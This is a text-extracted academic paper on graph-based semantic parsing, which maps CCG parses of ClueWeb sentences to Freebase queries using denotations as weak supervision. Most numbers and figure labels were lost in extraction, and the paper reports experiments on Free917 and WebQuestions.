∧ capital.of.arg (e, x) ∧ capital.of.arg (e, texas) {austin} (c) query graph after removing austin from graph (b) and its denotation. location .city capital target x m texas ty p e location. capital.arg location. capital.arg target(x) ∧ location.city(x) ∧ location.capital.arg (m, x) ∧ location.capital.arg (m, texas) location .city capital target x n texas ty p e location. containedby.arg location. containedby.arg target(x) ∧ location.city(x) ∧ location.containedby.arg (n, x) ∧ location.containedby.arg (n, texas) {austin} {austin, dallas, houston ... } (d) freebase graphs for nl graph (c) and their denotations. figure : steps involved in converting a natural language sentence to a freebase grounded graph. atically, ungrounded graphs may give rise to many grounded graphs. since we do not make use of manual annotations of sentences or question-answer pairs, we do not know which grounded graphs are correct. to overcome this, we rely on comparisons between denotations of natural language queries and related freebase queries as a form of weak supervi- sion in order to learn the mapping between nl and kb graphs. figure illustrates our approach for the sentence austin is the capital of texas. from the ccg syn- tactic derivation (which we omit here for the sake of brevity) we obtain a semantic parse (figure a) and convert it to an ungrounded graph (figure b). 
next, we select an entity from the graph and replace it with a variable x, creating a graph corresponding to the query what is the capital of texas? (figure c). the math function unique on austin in figure b indicates austin is the only value of x which can satisfy the query graph in figure c. therefore, the denotation of the nl query graph is {austin}. figure d shows two different groundings of the query graph in the freebase kb. we obtain these by replacing edges and nodes in the query graph with freebase relations and types. we use the denotation of the nl query as a form of weak supervision to select the best grounded graph. under the constraint that the denotation of a freebase query should be the same as the denotation of the nl query, the graph on the left hand-side of figure d is chosen as the correct grounding.

experimental results on two benchmark datasets consisting of questions to freebase — free (cai and yates, ) and webquestions (berant et al., ) — show that our semantic parser improves over state-of-the-art approaches. our contributions include: a novel graph-based method to convert natural language sentences to grounded semantic parses which exploits the similarities in the topology of knowledge graphs and linguistic structure, together with the ability to train using a wide range of features; a proposal to learn from a large scale web corpus, without question-answer pairs, based on denotations of queries from natural language statements as weak supervision; and the development of a scalable semantic parser which besides freebase uses clueweb for training, a corpus of . million webpages. our semantic parser can be downloaded from http://sivareddy.in/downloads.

framework
our goal is to build a semantic parser which maps a natural language sentence to a logical form that can be executed against freebase. we begin with clueweb , a web-scale corpus automatically annotated with freebase entities (gabrilovich et al., ). we extract the sentences containing at least two entities linked by a relation in freebase. we parse these sentences using a ccg syntactic parser, and build semantic parses from the syntactic output. semantic parses are then converted to semantic graphs which are subsequently grounded to freebase. grounded graphs can be easily converted to a kb query deterministically. during training we learn which grounded graphs correspond best to the natural language input. in the following, we provide a brief introduction to freebase and its graph structure. next, we explain how we obtain semantic parses from ccg (section . ), how we convert them to graphs (section . ), and ground them in freebase (section . ). section presents our learning algorithm.

. the freebase knowledge graph
freebase consists of million entities and . billion facts. a fact is defined by a triple containing two entities and a relation between them. entities represent real world concepts, and edges represent relations, thus forming a graph-like structure. a freebase subgraph is shown in figure with rectangles denoting entities.

figure : freebase knowledge graph. entities are represented by rectangles, relations between entities by edges, mediator nodes by circles, types by rounded rectangles.
in addition to simple facts, freebase encodes complex facts, represented by multiple edges (e.g., the edges connecting barack obama, columbia university and bachelor of arts). complex facts have intermediate nodes called mediator nodes (circles in figure with the same identifiers e.g., m and n). for reasons of uniformity, we assume that simple facts are also represented via mediator nodes and split single edges into two with each subedge going from the mediator node to the target node (see person.nationality.arg and person.nationality.arg in figure ). finally, freebase also has entity types defining is-a relations. in figure types are represented by rounded rectangles (e.g., barack obama is of type us president, and columbia university is of type education.university).
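to make the mediator-node convention concrete, the sketch below shows one possible in-memory encoding of such a subgraph. the entity, relation and type labels are illustrative stand-ins loosely based on the figure, not real freebase identifiers, and the data structure itself is only an assumption about how these graphs could be represented, not the authors' implementation.

    # a minimal freebase-like subgraph: every fact, simple or complex, is
    # routed through a mediator node, and each subedge links the mediator
    # to one participating entity.
    from collections import defaultdict

    class KnowledgeGraph:
        def __init__(self):
            self.types = defaultdict(set)   # entity -> set of is-a types
            self.subedges = []              # (mediator, relation, entity)

        def add_type(self, entity, entity_type):
            self.types[entity].add(entity_type)

        def add_fact(self, mediator, subedges):
            # subedges: list of (relation, entity); a simple fact has two
            # subedges, a complex fact has more, all sharing one mediator.
            for relation, entity in subedges:
                self.subedges.append((mediator, relation, entity))

    kb = KnowledgeGraph()
    kb.add_type("barack obama", "us president")              # illustrative labels
    kb.add_type("columbia university", "education.university")
    kb.add_fact("m", [("education.student", "barack obama"),
                      ("education.institution", "columbia university"),
                      ("education.degree", "bachelor of arts")])
    kb.add_fact("n", [("person.nationality.arg1", "barack obama"),
                      ("person.nationality.arg2", "usa")])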
. combinatory categorial grammar
the graph like structure of freebase inspires us to create a graph like structure for natural language, and learn a mapping between them. to do this we take advantage of the representational power of combinatory categorial grammar (steedman, ). ccg is a linguistic formalism that tightly couples syntax and semantics, and can be used to model a wide range of language phenomena. ccg is well known for capturing long-range dependencies inherent in constructions such as coordination, extraction, raising and control, as well as standard local predicate-argument dependencies (clark et al., ), thus supporting wide-coverage semantic analysis. moreover, due to the transparent interface between syntax and semantics, it is relatively straightforward to build a semantic parse for a sentence from its corresponding syntactic derivation tree (bos et al., ).

in our case, the choice of syntactic parser is motivated by the scale of our problem; the parser must be broad-coverage and robust enough to handle a web-sized corpus. for these reasons, we rely on the c&c parser (clark and curran, ), a general-purpose ccg parser, to obtain syntactic derivations. to our knowledge, we present the first attempt to use a ccg parser trained on treebanks for grounded semantic parsing. most previous work has induced task-specific ccg grammars (zettlemoyer and collins, , ; kwiatkowski et al., ). an example ccg derivation is shown in figure .

figure : ccg derivation for cameron directed titanic, containing both syntactic and semantic parse construction; the derivation yields directed.arg (e, cameron) ∧ directed.arg (e, titanic).

semantic parses are constructed from syntactic ccg parses, with semantic composition being guided by the ccg syntactic derivation. we use a neo-davidsonian (parsons, ) semantics to represent semantic parses. (neo-davidsonian semantics is a form of first-order logic that uses event identifiers (e) to connect verb predicates and their subcategorized arguments through conjunctions; see bos et al. ( ) for a detailed introduction to semantic representation using ccg.) each word has a semantic category based on its syntactic category and part of speech. for example, the syntactic category for directed is (s\np)/np, i.e., it takes two argument nps and becomes s. to represent its semantic category, we use a lambda term λyλx. directed.arg (e,x) ∧ directed.arg (e,y), where e identifies the event of directed, and x and y are arguments corresponding to the nps in the syntactic category.

we obtain semantic categories automatically using the indexed syntactic categories provided by the c&c parser. the latter reveal the bindings of basic constituent categories in more complex categories. for example, in order to convert ((s\np)\(s\np))/np to its semantic category, we must know whether all nps have the same referent and thus use the same variable name. the indexed category ((se\npx)\(se\npx))/npy reveals that there are only two different nps, x and y, and that one of them (i.e., x) is shared across two subcategories. we discuss the details of semantic category construction in the appendix.

apart from n-ary predicates representing events (mostly verbs), we also use unary predicates representing types in language (mostly common nouns and noun modifiers). for example, capital(austin) indicates austin is of type capital. prepositions, adjectives and adverbs are represented by predicates lexicalized with their head words to provide more information (see capital.of.arg instead of of.arg in figure a).
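the lambda term above can be mimicked directly with ordinary closures; the toy sketch below composes the semantic category of directed with its two noun-phrase arguments to produce the conjunction of predications from the running example. the predicate and argument names come from the text, but the encoding of a semantic parse as a set of strings is our own illustrative choice, not part of the authors' system.

    # a toy rendering of neo-davidsonian composition: the verb's semantic
    # category is a curried function over its np arguments, and applying it
    # yields predications tied together by the event identifier e.
    def directed(event):
        # corresponds to λyλx. directed.arg1(e, x) ∧ directed.arg2(e, y)
        return lambda y: lambda x: {
            f"directed.arg1({event}, {x})",
            f"directed.arg2({event}, {y})",
        }

    semantic_parse = directed("e")("titanic")("cameron")
    print(" ∧ ".join(sorted(semantic_parse)))
    # directed.arg1(e, cameron) ∧ directed.arg2(e, titanic)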
entity variables are connected to their correspond- ing word nodes from which they originate by dotted links e.g., x in figure a is connected to the word node who. mediator nodes (circles) mediator nodes are de- noted by circles and represent events in language. they connect pairs of entities which participate in an event forming a clique (see the entities cameron, titanic and in figure a). we define an edge as a link that connects any two entities via a medi- ator. the subedge of an edge i.e., the link between a mediator and an entity, corresponds to the predi- cate denoting the event and taking the entity as its argument (e.g. directed.arg links e and cameron in figure a). mediator nodes are connected to their corresponding word nodes from which they origi- nate by dotted links e.g. mediators in figure a are connected to word node directed. type nodes (rounded rectangles) type nodes are denoted by rounded rectangles. they represent unary predicates in natural language. in figure b type nodes capital and capital.state are attached to austin denoting austin is of type capital and capi- tal.state. type nodes are also connected to their cor- responding word nodes from which they originate by dotted links e.g. type node capital.state and word node state in figure b. math nodes (diamonds) math nodes are denoted by diamonds. they describe functions to be applied on the nodes/subgraphs they attach to. the function target attaches to the entity variable of interest. for example, the graph in figure a represents the question who directed the nutty professor?. here, target attaches to x representing the word who. unique attaches to the entity variable modified by the definite article the. in figure b, unique at- taches to austin implying that only austin satisfies the graph. finally, count attaches to entity nodes which have to be counted. for the sentence julie an- drews has appeared in movies in figure , the kb could either link julie andrews and , with type node movies matching the grounded type integer, or it could link julie andrews to each movie she acted in and the count of these different movies add to . in anticipation of this ambiguity, we generate two semantic parses resulting in two ungrounded graphs (see figures a and b). we generate all possible grounded graphs corresponding to each ungrounded graph, and leave it up to the learning to decide which ones the kb prefers. . grounded semantic graphs we ground semantic graphs in freebase by mapping edge labels to relations, type nodes to entity types, and entity nodes to freebase entities. math nodes remain unchanged. though word nodes are not present in freebase, we retain them in our grounded graphs to extract sophisticated features based on words and grounded predicates. appeared movies movies julie andrews e appeared .arg appeared.in ty p e appeared.arg (e, julieandrews) ∧ appeared.in(e, ) ∧ movies( ) (a) ungrounded graph appeared movies movies julie andrews e z count appeared .arg appeared .in ty p e appeared.arg (e, julieandrews) ∧ appeared.in(e, z) ∧ movies(z) ∧ count(z, ) (b) alternate ungrounded graph appeared film movies julie andrews m z count performance .actor performance .film ty p e performance.actor(m, julieandrews) ∧ performance.film(m, z) ∧ film(z) ∧ count(z, ) (c) grounded graph figure : graph representations for the sentence julie andrews has appeared in movies. un- grounded graph (a) directly connects julie andrews and , whereas graph (b) uses the math func- tion count. 
ungrounded graph (b) and grounded graph (c) have similar topology. entity nodes previous approaches (cai and yates, ; berant et al., ; kwiatkowski et al., ) use a manual lexicon or heuristics to ground named entities to freebase entities. fortunately, clueweb sentences have been automatically annotated with freebase entities, so we use these an- notations to ground proper names to freebase enti- ties (denoted by uppercase words) e.g., cameron in figure a is grounded to freebase entity cameron in figure b. common nouns like movies (see fig- ure b) are left as variables to be instantiated by the entities satisfying the graph. type nodes type nodes are grounded to free- base entity types. type nodes capital and capi- tal.state in figure b are grounded to all possible types of austin (e.g., location.city, location.capital city, book.book subject, broadcast.genre). in cases where entity nodes are not grounded, (e.g., z in figure b), employees employees e alcoa has e e type ha s.a rg ha s.a rg h a s.in h a s. a rg has.arg has.in has.arg (e, alcoa) ∧ has.arg (e, ) ∧ has.in(e, ) ∧ employees( ) (a) ungrounded graph employees type.int m alcoa has m m type em plo ye r.n um be r of em plo ye es .in ve rse m ea su re m en t un it .d at ed in te ge r .n um be r m e a su re m e n t u n it .d a te d in te g e r .y e a r m e a su re m e n t u n it .d a te d in te g e r .n u m b e r employer.number of employees .inverse m easurem ent unit .dated integer .year employer.number of employees.inverse(m, alcoa) ∧ measurement unit.dated integer.number(m, ) ∧ measurement unit.dated integer.year(m, ) ∧ type.int( ) (b) grounded graph figure : graph representations for alcoa has employees in . we use an automatically constructed lexicon which maps ungrounded types to grounded ones (see sec- tion . for details). edges an edge between two entities is grounded using all edges linking the two entities in the knowl- edge graph. for example, to ground the edge be- tween titanic and cameron in figure , we use the following edges linking titanic and cameron in freebase: (film.directed by.arg , film.directed by.arg ), (film.produced by.arg , film.produced by.arg ). if only one entity is grounded, we use all possible edges from this grounded entity. if no entity is grounded, we use a mapping lexicon which is automatically created as described in section . . given an un- grounded graph with n edges, there are o((k + )n) possible grounded graphs, with k being the grounded edges in the knowledge graph for each ungrounded edge together with an additional empty (no) edge. mediator nodes in an ungrounded graph, media- tor nodes represent semantic event identifiers. in the grounded graph, they represent freebase fact identi- fiers. fact identifiers help distinguish if neighboring edges belong to a single complex fact, which may or may not be coextensive with an ungrounded event. in figure a, the edges corresponding to the event identifier e are grounded to a single complex fact in figure b, with the fact identifier m. however, in figure a, the edges of the ungrounded event e are grounded to different freebase facts, distinguished in figure b by the identifiers m and n. furthermore, the edge in a between cameron and is not grounded in b, since no freebase edge exists be- tween the two entities. we convert grounded graphs to sparql queries, but for readability we only show logical expressions. the conversion is deterministic and is exactly the inverse of the semantic parse to graph conversion (section . ). 
wherever a node/edge is instantiated with a grounded entity/type/relation in freebase, we use them in the grounded parse (e.g., type node cap- ital.state in figure b becomes location.capital city). math function target is useful in retrieving instan- tiations of entity variables of interest (see figure a). learning a natural language sentence may give rise to several grounded graphs. but only one (or a few) of them will be a faithful representation of the sentence in freebase. we next describe our algorithm for find- ing the best freebase graph for a given sentence, our learning model, and the features it uses. . algorithm freebase has a large number of relations and enti- ties, and as a result there are many possible grounded graphs g for each ungrounded graph u. we con- struct and score graphs incrementally, traversing each node in the ungrounded graph and matching its edges and types in freebase. given a nl sentence s, we construct from its ccg syntactic derivation all corresponding ungrounded graphs u. using a beam search procedure (described in section . ), we find the best scoring graphs (ĝ,û), maximizing over dif- ferent graph configurations (g,u) of s: (ĝ,û) = arg max g,u Φ(g,u,s,k b)·θ ( ) we define the score of (ĝ,û) as the dot product between a high dimensional feature representation Φ = (Φ ,...Φm) and a weight vector θ (see sec- tion . for details on the features we employ). we estimate the weights θ using the averaged structured perceptron algorithm (collins, ). as shown in algorithm , the perceptron makes sev- eral passes over sentences, and in each iteration it computes the best scoring (ĝ,û) among the candi- date graphs for a given sentence. in line , the al- gorithm updates θ with the difference (if any) be- algorithm : averaged structured perceptron input: training sentences: {si}ni= θ ← for t ← ...t do for i ← ...n do (ĝi,ûi) = arg max gi,ui Φ(gi,ui,si,k b)·θ if (u+i ,g + i ) = (ûi,ĝi) then θ ← θ + Φ(g+i ,u + i ,si,k b)−Φ(ĝi,ûi,si,k b) return t ∑ t t=i n ∑ n i= θ i t tween the feature representations of the best scoring graph (ĝ,û) and the gold standard graph (g+,u+). the goal of the algorithm is to rank gold standard graphs higher than the any other graphs. the final weight vector θ is the average of weight vectors over t iterations and n sentences. this averaging pro- cedure avoids overfitting and produces more stable results (collins, ). as we do not make use of question-answer pairs or manual annotations of sentences, gold standard graphs (g+,u+) are not available. in the following, we explain how we approximate them by relying on graph denotations as a form of weak supervision. . selecting surrogate gold graphs let u be an ungrounded semantic graph of s. we se- lect an entity e in u, replace it with a variable x, and make it a target node. let u+ represent the resulting ungrounded graph. next, we obtain all grounded graphs g+ which correspond to u+ such that the denotations [[u+]]k b = [[g +]]n l . we use these surrogate graphs g+as gold standard, and the pairs (u+,g+) for model training. there is con- siderable latitude in choosing which entity e to re- place. this can be done randomly, according to en- tity frequency, or some other criterion. we found that substituting the entity with the most connections to other entities in the sentence works well in prac- tice. all the entities that can replace x in u+ to con- stitute a valid fact in freebase will be the denotation of u+, [[u+]]n l . 
as we do not make use of question-answer pairs or manual annotations of sentences, gold standard graphs (g+, u+) are not available. in the following, we explain how we approximate them by relying on graph denotations as a form of weak supervision.

. selecting surrogate gold graphs
let u be an ungrounded semantic graph of s. we select an entity e in u, replace it with a variable x, and make it a target node. (we also remove unique attached to x to exactly mimic the test time setting.) let u+ represent the resulting ungrounded graph. next, we obtain all grounded graphs g+ which correspond to u+ such that the denotations [[u+]]n l = [[g+]]k b. we use these surrogate graphs g+ as gold standard, and the pairs (u+, g+) for model training. there is considerable latitude in choosing which entity e to replace. this can be done randomly, according to entity frequency, or some other criterion. we found that substituting the entity with the most connections to other entities in the sentence works well in practice. all the entities that can replace x in u+ to constitute a valid fact in freebase will be the denotation of u+, [[u+]]n l. while it is straightforward to compute [[g+]]k b, it is hard to compute [[u+]]n l because of the mismatch between our natural language semantic language and the freebase query language. to ensure that graphs u+ and g+ have the same denotations, we impose the following constraints:

constraint: if the math function unique is attached to the entity being replaced in the ungrounded graph, we assume the denotation of u+ contains only that entity. for example, in figure b, we replace austin by x, and thus assume [[u+]]n l = {austin}. any grounded graph which results in [[g+]]k b = {austin} will be considered a surrogate gold graph. this allows us to learn entailment relations, e.g., capital.of should be grounded to location.capital (left hand-side graph in figure d) and not to location.containedby which results in all locations in texas (right hand-side graph in figure d).

constraint: if the target entity node is a number, we select the freebase graphs with denotation close to this number. for example, in figure a if , is replaced by x, we assume [[u+]]n l = { , }. however, the grounded graph b retrieves [[g+]]k b = { , }. we treat this as correct if β/γ ∈ [ . , . ] where β ∈ [[u+]]n l and γ ∈ [[g+]]k b. integers can either occur directly in relation with an entity as in figure b, or must be enumerated as in figure c.

constraint: if the target entity node is a date, we select the grounded graph which results in the smallest set containing the date, based on the intuition that most sentences in the data describe specific rather than general events.

constraint: if none of the above constraints apply to the target entity e, we know e ∈ [[u+]]n l, and hence we select the grounded graphs which satisfy e ∈ [[g+]]k b as surrogate gold graphs.

. features
our feature vector Φ(g, u, s, k b) denotes the features extracted from a sentence s and its corresponding graphs u and g with respect to a knowledge base k b. the elements of the vector (φ , φ , ...) take integer values denoting the number of times a feature appeared. we devised the following broad feature classes:

lexical alignments. since ungrounded graphs are similar in topology to grounded graphs, we extract ungrounded and grounded edge and type alignments. so, from graphs a and b, we obtain the edge alignment φedge(directed.arg , directed.arg , film.directed by.arg , film.directed by.arg ) and the subedge alignments φedge(directed.arg , film.directed by.arg ) and φedge(directed.arg , film.directed by.arg ). in a similar fashion we extract type alignments (e.g., φtype(capital, location.city)).

contextual features. in addition to lexical alignments, we also use contextual features which essentially record words or word combinations surrounding grounded edge labels. feature φevent records an event word and its grounded predicates (e.g., in figure c we extract features φevent(appear, performance.film) and φevent(appear, performance.actor)). feature φarg records a predicate and its argument words (e.g., φarg(performance.film, movie) in figure c). word combination features are extracted from the parser's dependency output. the feature φdep records a predicate and the dependencies of its event word (e.g., from the grounded version of figure b we extract features φdep(location.state.capital.arg , capital, state) and φdep(location.state.capital.arg , capital, state)). using such features, we are able to handle multiword predicates.
lexical similarity. we count the number of word stems shared by grounded and ungrounded edge labels (we use the porter stemmer), e.g., in figure directed.arg and film.directed by.arg have one stem overlap (ignoring the argument labels arg and arg ). for a grounded graph, we compute φstem, the aggregate stem overlap count over all its grounded and ungrounded edge labels. we did not incorporate wordnet/wiktionary-based lexical similarity features but these were found fruitful in kwiatkowski et al. ( ). we also have a feature for stem overlap count between the grounded edge labels and the context words.

graph connectivity features. these features penalize graphs with non-standard topologies. for example, we do not want a final graph with no edges. the feature value φhasedge is one if there exists at least one edge in the graph. we also have a feature φnodecount for counting the number of connected nodes in the graph. finally, feature φcolloc captures the collocation of grounded edges (e.g., edges belonging to a single complex fact are likely to co-occur; see figure b).
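since every element of Φ is an occurrence count, feature extraction can be sketched as below; the templates mirror φedge, φtype, φstem, φhasedge and φnodecount from the text, while the graph accessors and the stem and pairing helpers are hypothetical, reusing the container from the earlier sketch. this is an illustration of the counting scheme, not the authors' feature code.

    # count-valued features over an (ungrounded, grounded) graph pair.
    # edge_pairs, type_pairs and stem are assumed helper functions.
    from collections import Counter

    def extract_features(ungrounded, grounded):
        phi = Counter()
        for u_label, g_label in edge_pairs(ungrounded, grounded):
            phi[("edge", u_label, g_label)] += 1                     # φedge
            shared = set(map(stem, u_label.split("."))) & set(map(stem, g_label.split(".")))
            phi[("stem",)] += len(shared)                            # φstem
        for u_type, g_type in type_pairs(ungrounded, grounded):
            phi[("type", u_type, g_type)] += 1                       # φtype
        phi[("hasedge",)] = 1 if grounded.subedges else 0            # φhasedge
        phi[("nodecount",)] = len(grounded.entities)                 # φnodecount
        return phi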
for example, the sen- tence avatar is directed by cameron would be used for training, whereas avatar directed by cameron re- ceived a critical review wouldn’t. in the latter case, any semantic parse will have an uninstantiated en- tity variable for review. table (train) shows the number of sentences we obtained. in order to train our semantic parser, we ini- tialized the alignment and type features (φedge and φtype, respectively) with the alignment lexicon weights. these weights are computed as follows. let count(r′,r) denote the number of pairs of enti- ties which are linked with edge r′ in freebase and edge r in clueweb sentences. we then estimate the probability distribution p(r′/r) = count(r ′,r) ∑i count(r ′ i,r) . analogously, we created a type alignment lexicon. the counts were collected from clueweb sen- tences containing pairs of entities linked with an edge in freebase (business k, film k, and people k). contextual features were initialized to − since most word contexts and grounded predi- cates/types do not appear together. all other features were set to . we used a beam-search algorithm to convert un- grounded graphs to grounded ones. the edges and types of each ungrounded graph are placed in a pri- ority queue. priority is based on edge/type tf-idf scores collected over clueweb . at each step, we pop an element from the queue and ground it in freebase. we rank the resulting grounded graphs us- http://virtuoso.openlinksw.com ing the perceptron model, and pick the n-best ones, where n is the beam size. we continue until the queue is empty. in our experiments we used a beam size of . we trained a single model for all the do- mains combined together. we ran the perceptron for iterations (around – million queries). at each training iteration we used , randomly selected sentences from the training corpus. . comparison systems we compared our graph-based semantic parser (henceforth graphparser) against two state-of- the-art systems both of which are open-domain and work with freebase. the semantic parser developed by kwiatkowski et al. ( ) (henceforth kcaz ) is learned from question-answer pairs and follows a two-stage procedure: first, a natural language sen- tence is converted to a domain-independent seman- tic parse and then grounded onto freebase using a set of logical-type equivalent operators. the opera- tors explore possible ways sentential meaning could be expressed in freebase and essentially transform logical form to match the target ontology. our ap- proach also has two steps (i.e., we first generate mul- tiple ungrounded graphs and then ground them to different freebase graphs). we do not use opera- tors to perform structure matching, rather we cre- ate multiple graphs and leave it up to the learner to find an appropriate grounding using a rich feature space. to give a specific example, their operator lit- eral to constant is equivalent to having named enti- ties for larger text chunks in our case. their operator split literal explores different edge possibilities in an event whereas we start with a clique and remove un- wanted edges. our approach has (almost) similar expressive power but is conceptually simpler. our second comparison system was the seman- tic parser of berant and liang ( ) (henceforth parasempre) which also uses qa pairs for train- ing and makes use of paraphrasing. 
. comparison systems
we compared our graph-based semantic parser (henceforth graphparser) against two state-of-the-art systems, both of which are open-domain and work with freebase. the semantic parser developed by kwiatkowski et al. ( ) (henceforth kcaz ) is learned from question-answer pairs and follows a two-stage procedure: first, a natural language sentence is converted to a domain-independent semantic parse and then grounded onto freebase using a set of logical-type equivalent operators. the operators explore possible ways sentential meaning could be expressed in freebase and essentially transform logical form to match the target ontology. our approach also has two steps (i.e., we first generate multiple ungrounded graphs and then ground them to different freebase graphs). we do not use operators to perform structure matching; rather we create multiple graphs and leave it up to the learner to find an appropriate grounding using a rich feature space. to give a specific example, their operator literal to constant is equivalent to having named entities for larger text chunks in our case. their operator split literal explores different edge possibilities in an event whereas we start with a clique and remove unwanted edges. our approach has (almost) similar expressive power but is conceptually simpler.

our second comparison system was the semantic parser of berant and liang ( ) (henceforth parasempre), which also uses qa pairs for training and makes use of paraphrasing. given an input nl sentence, they first construct a set of logical forms based on hand-coded rules, and then generate sentences from each logical form (using generation templates and a lexicon). pairs of logical forms and natural language are finally scored using a paraphrase model consisting of two components: an association model determines whether they contain phrase pairs likely to be paraphrases, and a vector space model assigns a vector representation for each sentence and learns a scoring function that ranks paraphrase candidates. our semantic parser employs a graph-based representation as a means of handling the mismatch between natural language, whereas parasempre opts for a text-based one through paraphrasing.

finally, we compared our semantic parser against a baseline which is based on graphs but employs no learning. the baseline converts an ungrounded graph to a grounded one by replacing each ungrounded edge/type with the highest weighted grounded label creating a maximum weighted graph, henceforth mwg. both graphparser and the baseline use the same alignment lexicon (a weighted mapping from ungrounded to grounded labels).

results
table summarizes our results on free .

table : experimental results on free (precision, recall and f ) for mwg, kcaz and graphparser.

as described earlier, we evaluated graphparser on a subset of the dataset representing three domains (business, film, and people). since this subset contains a relatively small number of instances ( in total), we performed -fold cross validation with folds as development data, and one fold as test data. (the development data is only used for model selection and for determining the optimal training iteration.) we report results averaged over all test folds. with respect to kcaz , we present results with their cross-domain trained models, where training data from multiple domains is used to test foreign domains. (we are grateful to tom kwiatkowski for supplying us with the output of their system.) kcaz used generic features like string similarity and knowledge base features which apply across domains and do not require in-domain training data. we do not report results with parasempre as the small number of training instances would put their method at a disadvantage. we treat a predicted query as correct if its denotation is exactly equal to the denotation of the manually annotated gold query.

as can be seen, graphparser outperforms kcaz and the mwg baseline by a wide margin. this is an encouraging result bearing in mind that our model does not use question-answer pairs. we should also point out that our domain relation set is larger compared to kcaz . we do not prune any of the relations in freebase, whereas kcaz use only relations and types from our three domains (see table ). we further performed a feature ablation study to examine the contribution of different feature classes.

table : graphparser ablation results on the free and webquestions development sets (all features, and with contextual, alignment, connectivity or similarity features removed).

as shown in table , the most important features are those based on lexical similarity, as also observed in kcaz . graph connectivity and lexical alignments are equally important (these features are absent from kcaz ). contextual features are not very helpful over and above alignment features which also encode contextual information.
overall, generic features like lexical similarity are helpful only to a certain extent; the performance of graphparser improves considerably when additional graph-related features are taken into account.

we also analyzed the errors graphparser makes. % of these are caused by the c&c parser and are cases where it either returns no syntactic analysis or a wrong one. % of the errors are due to freebase inconsistencies. for example, our system answered the question how many stores are in nittany mall? with using the relation shopping center.number of stores whereas the gold standard provides the answer counting all stores using the relation shopping center.store. around % of errors include structural mismatches between natural language and freebase; for the question who is the president of gap inc?, our method grounds president to a grounded type whereas in freebase it is represented as a relation employment.job.title. the remaining errors are miscellaneous. for example, the question what are some films on antarctica? receives two interpretations, i.e., movies filmed in antarctica or movies with antarctica as their subject.

we next discuss our results on webquestions. parasempre was trained with , qa pairs (corresponding to our target domains) together with question paraphrases obtained from the paralex corpus (fader et al., ). (we used the sempre package (http://www-nlp.stanford.edu/software/sempre/), which does not use any hand-coded entity disambiguation lexicon.) while training parasempre, out-of-domain freebase relations and types were removed. both graphparser and parasempre were tested on the same set of in-domain qa pairs with exact answer match as the evaluation criterion. for development purposes, graphparser uses qa pairs. table displays our results.

table : experimental results on webquestions (precision, recall and f ) for mwg, parasempre, graphparser and graphparser + para.

we observe that graphparser obtains a higher f against mwg and parasempre. differences in performance among these systems are less pronounced compared to free . this is for a good reason. webquestions is a challenging dataset, created by non-experts. the questions are not tailored to freebase in any way, they are more varied and display a wider vocabulary. as a result the mismatch between natural language and freebase is greater and the semantic parsing task harder. error analysis further revealed that parsing errors are responsible for % of the questions graphparser fails to answer. another cause of errors is mismatches between natural language and freebase. around % of the questions are of the type where did x come from?, and our model answers with the individual's nationality, whereas annotators provide the birthplace (city/town/village) as the right answer. moreover, % of the questions are of the type what does x do?, which the annotators answer with the individual's profession. in natural language, we rarely attest constructions like x does dentist/researcher/actor. the proposed framework assumes that freebase and natural language are somewhat isomorphic, which is not always true. an obvious future direction would be to paraphrase the questions so as to increase the number of grounded and ungrounded graphs. as an illustration, we rewrote questions like where did x come from to what is x's birth place, and what did x do to what is x's profession, and evaluated our model graphparser + para. as shown in table , even simple paraphrasing can boost performance.
finally, table (third column) examines the con- tribution of different features on the webques- tions development dataset. interestingly, we ob- serve that contextual features are not useful and in fact slightly harm performance. we hypothesize that this is due to the higher degree of mismatch between natural language and freebase in this dataset. fea- tures based on similarity, graph connectivity, and lexical alignments are more robust and generally useful across datasets. discussion in this paper, we introduce a new semantic pars- ing approach for freebase. a key idea in our work is to exploit the structural and conceptual similari- ties between natural language and freebase through a common graph-based representation. we formal- ize semantic parsing as a graph matching problem and learn a semantic parser without using annotated question-answer pairs. we have shown how to ob- tain graph representations from the output of a ccg parser and subsequently learn their correspondence to freebase using a rich feature set and their deno- tations as a form of weak supervision. our parser yields state-of-the art performance on three large freebase domains and is not limited to question an- swering. we can create semantic parses for any type of nl sentences. our work brings together several strands of re- search. graph-based representations of sentential meaning have recently gained some attention in the literature (banarescu et al., ), and attempts to map sentences to semantic graphs have met with good inter-annotator agreement. our work is also closely related to kwiatkowski et al. ( ) and be- rant and liang ( ) who present open-domain se- mantic parsers based on freebase and trained on qa pairs. despite differences in formulation and model structure, both approaches have explicit mechanisms for handling the mismatch between natural language and the kb (e.g., using logical-type equivalent oper- ators or paraphrases). the mismatch is handled im- plicitly in our case via our graphical representation which allows for the incorporation of all manner of powerful features. more generally, our method is based on the assumption that linguistic structure has a correspondence to freebase structure which does not always hold (e.g., in who is the grandmother of prince william?, grandmother is not directly ex- pressed as a relation in freebase). additionally, our model fails when questions are too short with- out any lexical clues (e.g., what did charles darwin do? ). supervision from annotated data or paraphras- ing could improve performance in such cases. in the future, we plan to explore cluster-based semantics (lewis and steedman, ) to increase the robust- ness on unseen nl predicates. our work joins others in exploiting the connec- tions between natural language and open-domain knowledge bases. recent approaches in relation ex- traction use distant supervision from a knowledge base to predict grounded relations between two tar- get entities (mintz et al., ; hoffmann et al., ; riedel et al., ). during learning, they ag- gregate sentences containing the target entities, ig- noring richer contextual information. in contrast, we learn from each individual sentence taking into account all entities present, their relations, and how they interact. krishnamurthy and mitchell ( ) formalize semantic parsing as a distantly supervised relation extraction problem combined with a manu- ally specified grammar to guide semantic parse com- position. 
finally, our approach learns a model of semantics guided by denotations as a form of weak supervision. beyond semantic parsing (artzi and zettlemoyer, ; liang et al., ; clarke et al., ), feedback-based learning has been previously used for interpreting and following nl instructions (branavan et al., ; chen and mooney, ), playing computer games (branavan et al., ), and grounding language in the physical world (krishnamurthy and kollar, ; matuszek et al., ).

appendix
we use a handful of rules to divide words into semantic classes. based on a word's semantic class and indexed syntactic category, we construct its semantic category automatically. for example, directed is a member of the event class, and its indexed syntactic category is ((se\npx< >)/npy< >) (here, < > and < > indicate that x and y are the first and second arguments of e). we then generate its semantic category as λqλpλe.∃x∃y.directed.arg (e,x) ∧ directed.arg (e,y) ∧ p(x) ∧ q(y). please refer to appendix b of clark and curran ( ) for a list of their indexed syntactic categories.

the rules are described in table . syntactic categories are not shown for the sake of brevity. most rules will match any syntactic category. exceptions are copula-related rules (see be in the sixth row) which apply only to the syntactic category (s\np)/np, and rules pertaining to wh-words (see the last two rows in the table). when more than one rule apply, we end up with multiple semantic parses. there are a few cases like passives, question words, and prepositional phrases where we modified the original indexed categories for better interpretation of the semantics (these are not displayed here). we also handle non-standard ccg operators involving unary and binary rules as described in appendix a of clark and curran ( ).

